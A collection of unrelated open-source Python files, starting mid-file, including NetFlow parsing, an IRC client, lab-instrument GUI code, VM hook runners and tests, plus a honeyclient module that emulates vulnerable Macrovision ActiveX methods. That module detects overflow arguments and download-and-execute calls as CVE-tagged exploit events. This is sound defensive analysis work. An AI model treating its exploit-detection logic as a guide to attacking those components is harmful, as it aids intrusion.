IntField("dpkts", 0),
IntField("dbytes", 0),
IntField("starttime", 0),
IntField("endtime", 0),
ShortField("srcport", 0),
ShortField("dstport", 0),
ShortField("padding", 0),
ByteField("proto", 0),
ByteField("tos", 0),
IntField("padding1", 0),
IntField("padding2", 0) ]
bind_layers( NetflowHeader, NetflowHeaderV1, version=1)
bind_layers( NetflowHeaderV1, NetflowRecordV1, )
|
phaethon/scapy
|
kamene/layers/netflow.py
|
Python
|
gpl-2.0
| 1,595
|
'''
Code taken and adapted from:
The University of Manchester Computer Science
COMP18111 - Lab Exercise 3
version: 2011/2012
ex3.py - Module for ex3 - David Thorne / AIG / 15-01-2009
'''
import sys
from serverutils import Client
class IRCClient(Client):
def onMessage(self, socket, message):
# *** process incoming messages here ***
print message
return True
# Parse the IP address and port you wish to connect to.
ip = "0.0.0.0"
port = int(sys.argv[1])
# Create an IRC client.
client = IRCClient()
# Start server
client.start(ip, port)
# *** register your client here, e.g. ***
# client.send('/user %s' % screenName)
while client.isRunning():
try:
command = raw_input("> ").strip()
# *** process input from the user in a loop here ***
# *** use client.send(someMessage) to send messages to the server
client.send(command)
except:
client.stop()
client.stop()
|
radujipa/PiDroid
|
PiDroidRPi/source/client.py
|
Python
|
gpl-2.0
| 949
|
# Copyright © 2020, Joseph Berry, Rico Tabor (opendrop.dev@gmail.com)
# OpenDrop is released under the GNU GPL License. You are free to
# modify and distribute the code, but always under the same license
# (i.e. you cannot make commercial derivatives).
#
# If you use this software in your research, please cite the following
# journal articles:
#
# J. D. Berry, M. J. Neeson, R. R. Dagastine, D. Y. C. Chan and
# R. F. Tabor, Measurement of surface and interfacial tension using
# pendant drop tensiometry. Journal of Colloid and Interface Science 454
# (2015) 226–237. https://doi.org/10.1016/j.jcis.2015.05.012
#
# E. Huang, T. Denning, A. Skoufis, J. Qi, R. R. Dagastine, R. F. Tabor
# and J. D. Berry, OpenDrop: Open-source software for pendant drop
# tensiometry & contact angle measurements, submitted to the Journal of
# Open Source Software
#
# These citations help us not only to understand who is using and
# developing OpenDrop, and for what purpose, but also to justify
# continued development of this code and other open source resources.
#
# OpenDrop is distributed WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details. You
# should have received a copy of the GNU General Public License along
# with this software. If not, see <https://www.gnu.org/licenses/>.
from typing import Iterable, Sequence, Tuple
from gi.repository import Gtk, GObject
from injector import inject
from matplotlib import ticker
from matplotlib.backends.backend_gtk3cairo import FigureCanvasGTK3Cairo as FigureCanvas
from matplotlib.figure import Figure
from opendrop.app.ift.services.analysis import PendantAnalysisJob
from opendrop.appfw import Presenter, TemplateChild, component, install
from .services.graphs import IFTReportGraphsService
@component(
template_path='./graphs.ui',
)
class IFTReportGraphsPresenter(Presenter[Gtk.Stack]):
spinner: TemplateChild[Gtk.Spinner] = TemplateChild('spinner')
figure_container: TemplateChild[Gtk.Container] = TemplateChild('figure_container')
_analyses = ()
@inject
def __init__(self, graphs_service: IFTReportGraphsService) -> None:
self.graphs_service = graphs_service
def after_view_init(self) -> None:
figure = Figure(tight_layout=False)
self.figure = figure
self.figure_canvas = FigureCanvas(figure)
self.figure_canvas.props.hexpand = True
self.figure_canvas.props.vexpand = True
self.figure_canvas.props.visible = True
self.figure_container.add(self.figure_canvas)
self.figure_canvas_mapped = False
self.figure_canvas.connect('map', self.hdl_canvas_map)
self.figure_canvas.connect('unmap', self.hdl_canvas_unmap)
self.figure_canvas.connect('size-allocate', self.hdl_canvas_size_allocate)
self.ift_axes, volume_axes, surface_area_axes = figure.subplots(3, 1, sharex='col')
self.ift_axes.set_ylabel('IFT [mN/m]')
self.ift_axes.tick_params(axis='x', direction='inout')
volume_axes.xaxis.set_ticks_position('both')
volume_axes.tick_params(axis='x', direction='inout')
volume_axes.set_ylabel('V [mm³]')
surface_area_axes.xaxis.set_ticks_position('both')
surface_area_axes.tick_params(axis='x', direction='inout')
surface_area_axes.set_ylabel('SA [mm²]')
self.ift_axes.tick_params(axis='y', left=False, labelleft=False, right=True, labelright=True)
volume_axes.tick_params(axis='y', left=False, labelleft=False, right=True, labelright=True)
surface_area_axes.tick_params(axis='y', left=False, labelleft=False, right=True, labelright=True)
self.ift_axes.grid(axis='x', linestyle='--', color="#dddddd")
volume_axes.grid(axis='x', linestyle='--', color="#dddddd")
surface_area_axes.grid(axis='x', linestyle='--', color="#dddddd")
self.ift_axes.grid(axis='y', linestyle='-', color="#dddddd")
volume_axes.grid(axis='y', linestyle='-', color="#dddddd")
surface_area_axes.grid(axis='y', linestyle='-', color="#dddddd")
# Format the labels to scale to the right units.
self.ift_axes.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, pos: '{:.4g}'.format(x * 1e3)))
volume_axes.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, pos: '{:.4g}'.format(x * 1e9)))
surface_area_axes.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, pos: '{:.4g}'.format(x * 1e6)))
self.ift_line = self.ift_axes.plot([], marker='o', color='red')[0]
self.volume_line = volume_axes.plot([], marker='o', color='blue')[0]
self.surface_area_line = surface_area_axes.plot([], marker='o', color='green')[0]
self.graphs_service.connect('notify::ift', self.hdl_model_data_changed)
self.graphs_service.connect('notify::volume', self.hdl_model_data_changed)
self.graphs_service.connect('notify::surface-area', self.hdl_model_data_changed)
self.hdl_model_data_changed()
def hdl_canvas_map(self, *_) -> None:
self.figure_canvas_mapped = True
self.figure_canvas.draw_idle()
def hdl_canvas_unmap(self, *_) -> None:
self.figure_canvas_mapped = False
def hdl_canvas_size_allocate(self, *_) -> None:
self.figure.tight_layout(pad=2.0, h_pad=0)
self.figure.subplots_adjust(hspace=0)
@install
@GObject.Property
def analyses(self) -> Sequence[PendantAnalysisJob]:
return self._analyses
@analyses.setter
def analyses(self, analyses: Iterable[PendantAnalysisJob]) -> None:
self._analyses = tuple(analyses)
self.graphs_service.set_analyses(analyses)
def hdl_model_data_changed(self, *args) -> None:
ift_data = self.graphs_service.ift
volume_data = self.graphs_service.volume
surface_area_data = self.graphs_service.surface_area
if (
len(ift_data[0]) <= 1 and
len(volume_data[0]) <= 1 and
len(surface_area_data[0]) <= 1
):
self.show_waiting_placeholder()
return
self.hide_waiting_placeholder()
self.set_ift_data(ift_data)
self.set_volume_data(volume_data)
self.set_surface_area_data(surface_area_data)
if self.figure_canvas_mapped:
self.figure.tight_layout(pad=2.0, h_pad=0)
self.figure.subplots_adjust(hspace=0)
self.figure_canvas.draw_idle()
def show_waiting_placeholder(self) -> None:
self.host.set_visible_child(self.spinner)
self.spinner.start()
def hide_waiting_placeholder(self) -> None:
self.host.set_visible_child(self.figure_container)
self.spinner.stop()
def set_ift_data(self, data: Sequence[Tuple[float, float]]) -> None:
if len(data[0]) <= 1:
return
self.ift_line.set_data(data)
self.update_xlim()
self.ift_axes.relim()
self.ift_axes.margins(y=0.1)
def set_volume_data(self, data: Sequence[Tuple[float, float]]) -> None:
if len(data[0]) <= 1:
return
self.volume_line.set_data(data)
self.update_xlim()
self.volume_line.axes.relim()
self.volume_line.axes.margins(y=0.1)
def set_surface_area_data(self, data: Sequence[Tuple[float, float]]) -> None:
if len(data[0]) <= 1:
return
self.surface_area_line.set_data(data)
self.update_xlim()
self.surface_area_line.axes.relim()
self.surface_area_line.axes.margins(y=0.1)
def update_xlim(self) -> None:
all_xdata = (
*self.ift_line.get_xdata(),
*self.volume_line.get_xdata(),
*self.surface_area_line.get_xdata(),
)
if len(all_xdata) <= 1:
return
xmin = min(all_xdata)
xmax = max(all_xdata)
if xmin == xmax:
return
self.ift_axes.set_xlim(xmin, xmax)
|
ricotabor/opendrop
|
opendrop/app/ift/report/graphs/graphs.py
|
Python
|
gpl-2.0
| 8,059
|
# for example, i = 27
def is_multiple(n,m):
return n == m * 27
if __name__ == '__main__':
# test1
print('n=27,m=1:')
print(is_multiple(27, 1))
# test2
print('n=28,m=1:')
print(is_multiple(28, 1))
# test3
print('n=270,m=10:')
print(is_multiple(270, 10))
|
maxiee/DataStructuresAlgorithmsPythonExercises
|
chapter1/r_1_1.py
|
Python
|
gpl-2.0
| 294
|
#
# Copyright 2010-2011 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
from __future__ import print_function
from vdsm import utils
import glob
import hashlib
import itertools
import json
import logging
import os
import os.path
import sys
import tempfile
from vdsm.constants import P_VDSM_HOOKS, P_VDSM
class HookError(Exception):
pass
# dir path is relative to '/' for test purposes
# otherwise path is relative to P_VDSM_HOOKS
def _scriptsPerDir(dir):
if (dir[0] == '/'):
path = dir
else:
path = P_VDSM_HOOKS + dir
return [s for s in glob.glob(path + '/*')
if os.access(s, os.X_OK)]
_DOMXML_HOOK = 1
_JSON_HOOK = 2
def _runHooksDir(data, dir, vmconf={}, raiseError=True, params={},
hookType=_DOMXML_HOOK):
scripts = _scriptsPerDir(dir)
scripts.sort()
if not scripts:
return data
data_fd, data_filename = tempfile.mkstemp()
try:
if hookType == _DOMXML_HOOK:
os.write(data_fd, data or '')
elif hookType == _JSON_HOOK:
os.write(data_fd, json.dumps(data))
os.close(data_fd)
scriptenv = os.environ.copy()
# Update the environment using params and custom configuration
env_update = [params.iteritems(),
vmconf.get('custom', {}).iteritems()]
# Encode custom properties to UTF-8 and save them to scriptenv
# Pass str objects (byte-strings) without any conversion
for k, v in itertools.chain(*env_update):
try:
if isinstance(v, unicode):
scriptenv[k] = v.encode('utf-8')
else:
scriptenv[k] = v
except UnicodeDecodeError:
pass
if vmconf.get('vmId'):
scriptenv['vmId'] = vmconf.get('vmId')
ppath = scriptenv.get('PYTHONPATH', '')
scriptenv['PYTHONPATH'] = ':'.join(ppath.split(':') + [P_VDSM])
if hookType == _DOMXML_HOOK:
scriptenv['_hook_domxml'] = data_filename
elif hookType == _JSON_HOOK:
scriptenv['_hook_json'] = data_filename
errorSeen = False
for s in scripts:
rc, out, err = utils.execCmd([s], raw=True,
env=scriptenv)
logging.info(err)
if rc != 0:
errorSeen = True
if rc == 2:
break
elif rc > 2:
logging.warn('hook returned unexpected return code %s', rc)
if errorSeen and raiseError:
raise HookError(err)
with open(data_filename) as f:
final_data = f.read()
finally:
os.unlink(data_filename)
if hookType == _DOMXML_HOOK:
return final_data
elif hookType == _JSON_HOOK:
return json.loads(final_data)
def before_device_create(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'before_device_create', vmconf=vmconf,
params=customProperties)
def after_device_create(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'after_device_create', vmconf=vmconf,
params=customProperties, raiseError=False)
def before_device_destroy(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'before_device_destroy', vmconf=vmconf,
params=customProperties)
def after_device_destroy(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'after_device_destroy', vmconf=vmconf,
params=customProperties, raiseError=False)
def before_vm_start(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_start', vmconf=vmconf)
def after_vm_start(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_start',
vmconf=vmconf, raiseError=False)
def before_vm_cont(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_cont', vmconf=vmconf)
def after_vm_cont(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_cont',
vmconf=vmconf, raiseError=False)
def before_vm_pause(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_pause', vmconf=vmconf)
def after_vm_pause(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_pause',
vmconf=vmconf, raiseError=False)
def before_device_migrate_source(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'before_device_migrate_source',
vmconf=vmconf, params=customProperties)
def after_device_migrate_source(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'after_device_migrate_source',
vmconf=vmconf, params=customProperties,
raiseError=False)
def before_device_migrate_destination(
devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'before_device_migrate_destination',
vmconf=vmconf, params=customProperties)
def after_device_migrate_destination(
devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'after_device_migrate_destination',
vmconf=vmconf, params=customProperties,
raiseError=False)
def before_vm_migrate_source(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_migrate_source', vmconf=vmconf)
def after_vm_migrate_source(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_migrate_source', vmconf=vmconf,
raiseError=False)
def before_vm_migrate_destination(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_migrate_destination', vmconf=vmconf)
def after_vm_migrate_destination(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_migrate_destination', vmconf=vmconf,
raiseError=False)
def before_vm_hibernate(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_hibernate', vmconf=vmconf)
def after_vm_hibernate(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_hibernate', vmconf=vmconf,
raiseError=False)
def before_vm_dehibernate(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'before_vm_dehibernate', vmconf=vmconf,
params=params)
def after_vm_dehibernate(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'after_vm_dehibernate', vmconf=vmconf,
raiseError=False, params=params)
def before_vm_destroy(domxml, vmconf={}):
return _runHooksDir(None, 'before_vm_destroy', vmconf=vmconf,
raiseError=False)
def after_vm_destroy(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_destroy', vmconf=vmconf,
raiseError=False)
def before_vm_set_ticket(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'before_vm_set_ticket', vmconf=vmconf,
raiseError=False, params=params)
def after_vm_set_ticket(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'after_vm_set_ticket', vmconf=vmconf,
raiseError=False, params=params)
def before_update_device(devxml, vmconf={}, params={}):
return _runHooksDir(devxml, 'before_update_device', vmconf=vmconf,
params=params)
def after_update_device(devxml, vmconf={}, params={}):
return _runHooksDir(devxml, 'after_update_device', vmconf=vmconf,
raiseError=False, params=params)
def after_update_device_fail(devxml, vmconf={}, params={}):
return _runHooksDir(devxml, 'after_update_device_fail', vmconf=vmconf,
raiseError=False, params=params)
def before_nic_hotplug(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'before_nic_hotplug', vmconf=vmconf,
params=params)
def after_nic_hotplug(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'after_nic_hotplug', vmconf=vmconf,
params=params, raiseError=False)
def before_nic_hotunplug(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'before_nic_hotunplug', vmconf=vmconf,
params=params)
def after_nic_hotunplug(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'after_nic_hotunplug', vmconf=vmconf,
params=params, raiseError=False)
def after_nic_hotplug_fail(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'after_nic_hotplug_fail', vmconf=vmconf,
params=params, raiseError=False)
def after_nic_hotunplug_fail(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'after_nic_hotunplug_fail', vmconf=vmconf,
params=params, raiseError=False)
def before_disk_hotplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'before_disk_hotplug', vmconf=vmconf,
params=params)
def after_disk_hotplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'after_disk_hotplug', vmconf=vmconf,
params=params, raiseError=False)
def before_disk_hotunplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'before_disk_hotunplug', vmconf=vmconf,
params=params)
def after_disk_hotunplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'after_disk_hotunplug', vmconf=vmconf,
params=params, raiseError=False)
def before_set_num_of_cpus(vmconf={}, params={}):
return _runHooksDir(None, 'before_set_num_of_cpus', vmconf=vmconf,
params=params, raiseError=True)
def after_set_num_of_cpus(vmconf={}, params={}):
return _runHooksDir(None, 'after_set_num_of_cpus', vmconf=vmconf,
params=params, raiseError=False)
def before_memory_hotplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'before_memory_hotplug', vmconf=vmconf,
params=params)
def after_memory_hotplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'after_memory_hotplug', vmconf=vmconf,
params=params, raiseError=False)
def before_vdsm_start():
return _runHooksDir(None, 'before_vdsm_start', raiseError=False)
def after_vdsm_stop():
return _runHooksDir(None, 'after_vdsm_stop', raiseError=False)
def before_network_setup(network_config_dict):
return _runHooksDir(network_config_dict, 'before_network_setup',
hookType=_JSON_HOOK)
def after_network_setup(network_config_dict):
return _runHooksDir(network_config_dict, 'after_network_setup',
raiseError=False, hookType=_JSON_HOOK)
def after_network_setup_fail(network_config_dict):
return _runHooksDir(network_config_dict, 'after_network_setup_fail',
raiseError=False, hookType=_JSON_HOOK)
def before_get_vm_stats():
return _runHooksDir({}, 'before_get_vm_stats', raiseError=True,
hookType=_JSON_HOOK)
def after_get_vm_stats(stats):
return _runHooksDir(stats, 'after_get_vm_stats', raiseError=False,
hookType=_JSON_HOOK)
def before_get_all_vm_stats():
return _runHooksDir({}, 'before_get_all_vm_stats', raiseError=True,
hookType=_JSON_HOOK)
def after_get_all_vm_stats(stats):
return _runHooksDir(stats, 'after_get_all_vm_stats', raiseError=False,
hookType=_JSON_HOOK)
def before_get_caps():
return _runHooksDir({}, 'before_get_caps', raiseError=True,
hookType=_JSON_HOOK)
def after_get_caps(caps):
return _runHooksDir(caps, 'after_get_caps', raiseError=False,
hookType=_JSON_HOOK)
def before_get_stats():
return _runHooksDir({}, 'before_get_stats', raiseError=True,
hookType=_JSON_HOOK)
def after_get_stats(caps):
return _runHooksDir(caps, 'after_get_stats', raiseError=False,
hookType=_JSON_HOOK)
def before_ifcfg_write(hook_dict):
return _runHooksDir(hook_dict, 'before_ifcfg_write', raiseError=True,
hookType=_JSON_HOOK)
def after_ifcfg_write(hook_dict):
return _runHooksDir(hook_dict, 'after_ifcfg_write', raiseError=False,
hookType=_JSON_HOOK)
def after_hostdev_list_by_caps(devices):
return _runHooksDir(devices, 'after_hostdev_list_by_caps',
raiseError=False, hookType=_JSON_HOOK)
def _getScriptInfo(path):
try:
with open(path) as f:
md5 = hashlib.md5(f.read()).hexdigest()
except:
md5 = ''
return {'md5': md5}
def _getHookInfo(dir):
return dict([(os.path.basename(script), _getScriptInfo(script))
for script in _scriptsPerDir(dir)])
def installed():
res = {}
for dir in os.listdir(P_VDSM_HOOKS):
inf = _getHookInfo(dir)
if inf:
res[dir] = inf
return res
if __name__ == '__main__':
def usage():
print('Usage: %s hook_name' % sys.argv[0])
sys.exit(1)
if len(sys.argv) >= 2:
globals()[sys.argv[1]](*sys.argv[2:])
else:
usage()
|
borisroman/vdsm
|
vdsm/hooks.py
|
Python
|
gpl-2.0
| 14,132
|
# -*- coding: utf-8 -*-
#
from rest_framework import serializers
from common.utils import get_request_ip
from users.serializers.v2 import ServiceAccountSerializer
from ..models import Terminal
__all__ = ['TerminalSerializer', 'TerminalRegistrationSerializer']
class TerminalSerializer(serializers.ModelSerializer):
sa_serializer_class = ServiceAccountSerializer
sa_serializer = None
class Meta:
model = Terminal
fields = [
'id', 'name', 'remote_addr', 'command_storage',
'replay_storage', 'user', 'is_accepted', 'is_deleted',
'date_created', 'comment'
]
read_only_fields = ['id', 'remote_addr', 'user', 'date_created']
def is_valid(self, raise_exception=False):
valid = super().is_valid(raise_exception=raise_exception)
if not valid:
return valid
data = {'name': self.validated_data.get('name')}
kwargs = {'data': data}
if self.instance and self.instance.user:
kwargs['instance'] = self.instance.user
self.sa_serializer = ServiceAccountSerializer(**kwargs)
valid = self.sa_serializer.is_valid(raise_exception=True)
return valid
def save(self, **kwargs):
instance = super().save(**kwargs)
sa = self.sa_serializer.save()
instance.user = sa
instance.save()
return instance
def create(self, validated_data):
request = self.context.get('request')
instance = super().create(validated_data)
instance.is_accepted = True
if request:
instance.remote_addr = get_request_ip(request)
instance.save()
return instance
class TerminalRegistrationSerializer(serializers.Serializer):
name = serializers.CharField(max_length=128)
comment = serializers.CharField(max_length=128)
service_account = ServiceAccountSerializer(read_only=True)
|
liuzheng712/jumpserver
|
apps/terminal/serializers/v2.py
|
Python
|
gpl-2.0
| 1,920
|
##
# Copyright 2009-2017 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for CGAL, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
@author: Jens Timmerman (Ghent University)
"""
import os
from easybuild.easyblocks.generic.cmakemake import CMakeMake
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.modules import get_software_root
from easybuild.tools.systemtools import get_shared_lib_ext
class EB_CGAL(CMakeMake):
"""Support for building CGAL."""
def configure_step(self):
"""Set some extra environment variables before configuring."""
deps = ["Boost", "GMP", "MPFR"]
for dep in deps:
if not get_software_root(dep):
raise EasyBuildError("Dependency module %s not loaded?", dep)
for lib in ["GMP", "MPFR"]:
os.environ['%s_INC_DIR' % lib] = "%s%s" % (get_software_root(lib), "/include/")
os.environ['%s_LIB_DIR' % lib] = "%s%s" % (get_software_root(lib), "/lib/")
os.environ['BOOST_ROOT'] = get_software_root("Boost")
super(EB_CGAL, self).configure_step()
def sanity_check_step(self):
"""Custom sanity check for CGAL."""
shlib_ext = get_shared_lib_ext()
libdirs = ('lib', 'lib64')
libs = [tuple(os.path.join(d, 'libCGAL%s.%s' % (l, shlib_ext)) for d in libdirs) for l in ['', '_Core']]
custom_paths = {
'files': ['bin/cgal_%s' % x for x in ['create_cmake_script', 'make_macosx_app']] + libs,
'dirs': ['include/CGAL', ('lib/CGAL', 'lib64/CGAL')],
}
super(EB_CGAL, self).sanity_check_step(custom_paths=custom_paths)
|
ULHPC/easybuild-easyblocks
|
easybuild/easyblocks/c/cgal.py
|
Python
|
gpl-2.0
| 2,656
|
# MacrovisionJob, MacrovisionFlexNet
# CVE-2007-2419, CVE-2007-5660, CVE-2007-6654, CVE-2007-0321, CVE-2007-0328
import logging
log = logging.getLogger("Thug")
def Initialize(self, *args): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn('[Macrovision ActiveX] Initialize')
def CreateJob(self, name, arg, job_id):
log.ThugLogging.add_behavior_warn(f'[Macrovision ActiveX] CreateJob("{name}", "{arg}", "{job_id}")')
return self
def DownloadAndExecute(self, arg0, arg1, arg2, arg3, arg4):
log.ThugLogging.add_behavior_warn(f'[Macrovision ActiveX] DownloadAndExecute('
f'"{arg0}", "{arg1}", "{arg2}", "{arg3}", "{arg4}")')
log.ThugLogging.log_exploit_event(self._window.url,
"Macrovision ActiveX",
"DownloadAndExecute",
data = {
"arg" : arg0,
"arg1": arg1,
"arg2": arg2,
"arg3": arg3,
"arg4": arg4
},
forward = False)
if len(arg1) > 512:
log.ThugLogging.log_exploit_event(self._window.url,
"Macrovision ActiveX",
"DownloadAndExecute overflow",
cve = "CVE-2007-2419, CVE-2007-6654")
log.ThugLogging.Shellcode.check_shellcode(arg1)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6654")
log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] Fetching from URL {arg3}")
try:
self._window._navigator.fetch(arg3, redirect_type = "Macrovision Exploit")
except Exception: # pylint:disable=broad-except
log.ThugLogging.add_behavior_warn('[Macrovision ActiveX] Fetch failed')
def DownloadAndInstall(self, *args): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn('[Macrovision ActiveX] DownloadAndInstall')
def AddFileEx(self, arg0, arg1, arg2, arg3, arg4, arg5, arg6): # pylint:disable=unused-argument
if len(arg2) > 512:
log.ThugLogging.log_exploit_event(self._window.url,
"Macrovision ActiveX",
"AddFileEx overflow",
cve = "CVE-2007-2419")
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
log.ThugLogging.Shellcode.check_shellcode(arg2)
def AddFile(self, arg0, arg1):
log.ThugLogging.add_behavior_warn(f'[Macrovision ActiveX] AddFile("{arg0}", "{arg1}")')
log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] Fetching from URL {arg0}")
log.ThugLogging.log_exploit_event(self._window.url,
"Macrovision ActiveX",
"AddFile/Fetch from URL",
cve = "CVE-2007-2419",
forward = False,
data = {
"url": arg0,
"arg1": arg1
}
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
try:
self._window._navigator.fetch(arg0, redirect_type = "Macrovision Exploit 2")
except Exception: # pylint:disable=broad-except
log.ThugLogging.add_behavior_warn('[Macrovision ActiveX] Fetch failed')
def SetPriority(self, priority): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(f'[Macrovision ActiveX] SetPriority({priority})')
def SetNotifyFlags(self, flags): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(f'[Macrovision ActiveX] SetNotifyFlags({flags})')
def RunScheduledJobs(self): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn('[Macrovision ActiveX] RunScheduledJobs()')
|
buffer/thug
|
thug/ActiveX/modules/MacrovisionFlexNet.py
|
Python
|
gpl-2.0
| 4,390
|
"""
Copyright 2016 Mellanox Technologies. All rights reserved.
Licensed under the GNU General Public License, version 2 as
published by the Free Software Foundation; see COPYING for details.
"""
__author__ = """
idosch@mellanox.com (Ido Schimmel)
"""
from lnst.Controller.Task import ctl
from TestLib import TestLib
from time import sleep
def check_itc_max_occ(tl, iface, itc):
err_msg = ""
for itc_iter in range(1, 8):
max_occ = tl.devlink_tc_max_occ_get(iface, True, itc_iter)
if max_occ != 0 and itc != itc_iter:
err_msg = "itc {0} occ isn't zero when should be".format(itc_iter)
break
elif max_occ == 0 and itc == itc_iter:
err_msg = "itc {0} occ is zero when shouldn't be".format(itc)
break
tl.custom(iface.get_host(), "itc occ test", err_msg)
def do_task(ctl, hosts, ifaces, aliases):
m1, m2, sw = hosts
m1_if1, m2_if1, sw_if1, sw_if2 = ifaces
m1_if1.reset(ip=["192.168.101.10/24", "2002::1/64"])
m2_if1.reset(ip=["192.168.101.11/24", "2002::2/64"])
sleep(30)
sw.create_bridge(slaves=[sw_if1, sw_if2], options={"vlan_filtering": 1})
sw_if1.add_br_vlan(10)
sw_if2.add_br_vlan(10)
tl = TestLib(ctl, aliases)
sw.enable_service("lldpad")
sw_if1.enable_lldp()
tl.lldp_ets_default_set(sw_if1, willing=False)
m1.enable_service("lldpad")
m1_if1.enable_lldp()
tl.lldp_ets_default_set(m1_if1)
tl.ping_simple(m1_if1, m2_if1)
for prio in range(1, 8):
tl.lldp_ets_up2tc_set(sw_if1, [(prio, prio)])
tl.devlink_clearmax(sw, sw_if1.get_devlink_name())
sleep(5) # lldpad's event loop runs every second.
tl.pktgen(m1_if1, m2_if1, m1_if1.get_mtu(), vlan_id=10, vlan_p=prio)
check_itc_max_occ(tl, sw_if1, prio)
tl.lldp_ets_up2tc_set(sw_if1, [(prio, 0)])
do_task(ctl, [ctl.get_host("machine1"),
ctl.get_host("machine2"),
ctl.get_host("switch")],
[ctl.get_host("machine1").get_interface("if1"),
ctl.get_host("machine2").get_interface("if1"),
ctl.get_host("switch").get_interface("if1"),
ctl.get_host("switch").get_interface("if2")],
ctl.get_aliases())
|
jiriprochazka/lnst
|
recipes/switchdev/qos-001-pg.py
|
Python
|
gpl-2.0
| 2,227
|
from django.contrib.auth.models import User, Group
from django.core.urlresolvers import reverse
from django.test import TestCase, Client
from blog.models import News, Resource, ResourceType, Tag
from community.models import Community
from users.models import SystersUser
class CommunityNewsListViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_community_news_list_view_no_news(self):
"""Test GET request to news list with an invalid community slug and
with a valid community slug, but no news"""
url = reverse('view_community_news_list', kwargs={'slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
url = reverse('view_community_news_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post_list.html')
def test_community_news_list_view_with_news(self):
"""Test GET request to news list with a single existing community
news."""
News.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
